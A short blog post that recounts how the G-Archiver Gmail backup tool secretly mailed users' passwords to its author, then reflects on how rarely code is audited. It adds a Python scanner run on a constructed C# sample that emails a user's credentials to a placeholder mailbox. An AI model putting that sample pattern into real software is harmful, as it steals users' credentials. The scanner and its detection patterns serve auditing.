Trusted code

Coding Horror: A Question of Programming Ethics:

I was looking for a way to back up my gmail account to a local drive. I’ve accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I’ll give it a try. It didn’t really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends an email with their username and password to his personal email box! Having just entered my own information I became concerned.

And you can almost believe the programmer’s claim that he put it in for debugging and then forgot to take it out…

This makes me think a little bit about the supposed reproducibility of scientific experiments — it’s supposed to be a cornerstone of scientific method and a guarantee against serious fraud, but how many people do it? Similarly, how many people actually look at the code of some open-source project? They just assume that someone else somewhere is looking at it and auditing it for badness.
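As an added illustration of what "looking at the code" means for the pattern in the quoted post (a hard-coded mailbox and password, plus the user's credentials concatenated into an outbound mail), here is a small Python scan over decompiled C#-style source. This is example code written for this page, not code from the original post or from G-Archiver; the sample source, its variable names and the `audit`/`exfil_pattern_present` functions are all constructed.

```python
import re
from collections import defaultdict

# Constructed sample in decompiled-C#-style, modelled on the pattern the quoted
# post describes: a hard-coded mailbox, a hard-coded password, and the user's
# credentials concatenated into an outbound mail. Hypothetical names only.
SAMPLE_SOURCE = """\
private string smtpUser = "hypothetical.author@example.com";
private string smtpPass = "NotARealPassword";
public void AddAccount(string user, string pwd) {
    var msg = new MailMessage(smtpUser, smtpUser);
    msg.Body = "user=" + user + " pass=" + pwd;
    var client = new SmtpClient("smtp.example.com");
    client.Credentials = new NetworkCredential(smtpUser, smtpPass);
    client.Send(msg);
}
public void SaveSettings(string path) {
    File.WriteAllText(path, "ok");
}
"""

# A string literal assigned to a declared variable whose name suggests a secret.
HARDCODED_SECRET = re.compile(r'\b(?:string|var)\s+\w*(?:pass|pwd|secret|token)\w*\s*=\s*"[^"]+"', re.I)
# A mailbox address baked into the binary as a string literal.
MAILBOX_LITERAL = re.compile(r'"[^"@\s]+@[^"\s]+\.[a-z]{2,}"', re.I)
# .NET mail-sending primitives.
OUTBOUND_MAIL = re.compile(r'\b(?:MailMessage|SmtpClient)\b|\.Send\(')
# A message body or subject built from something named like a credential.
MESSAGE_FIELD = re.compile(r'\.(?:Body|Subject)\s*=')
CRED_NAME = re.compile(r'\b\w*(?:pass|pwd)\w*\b', re.I)

def audit(source):
    """Return {tag: [line numbers]} for each suspicious pattern found."""
    findings = defaultdict(list)
    for n, line in enumerate(source.splitlines(), 1):
        if HARDCODED_SECRET.search(line):
            findings["hardcoded-secret"].append(n)
        if MAILBOX_LITERAL.search(line):
            findings["hardcoded-mailbox"].append(n)
        if OUTBOUND_MAIL.search(line):
            findings["outbound-mail"].append(n)
        if MESSAGE_FIELD.search(line) and CRED_NAME.search(line):
            findings["credential-in-message"].append(n)
    return dict(findings)

def exfil_pattern_present(findings):
    """True only when the whole combination is present: a credential placed in a
    message, mail actually sent, and a hard-coded mailbox or secret to send with."""
    return (bool(findings.get("credential-in-message"))
            and bool(findings.get("outbound-mail"))
            and bool(findings.get("hardcoded-mailbox") or findings.get("hardcoded-secret")))

if __name__ == "__main__":
    for tag, lines in sorted(audit(SAMPLE_SOURCE).items()):
        print(f"{tag:22s} lines {lines}")
    print("exfiltration pattern:", exfil_pattern_present(audit(SAMPLE_SOURCE)))
```

Each tag on its own is only a hint (plenty of legitimate programs send mail or embed an address); the point is that the combination is what an auditor reading decompiled output would stop on.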
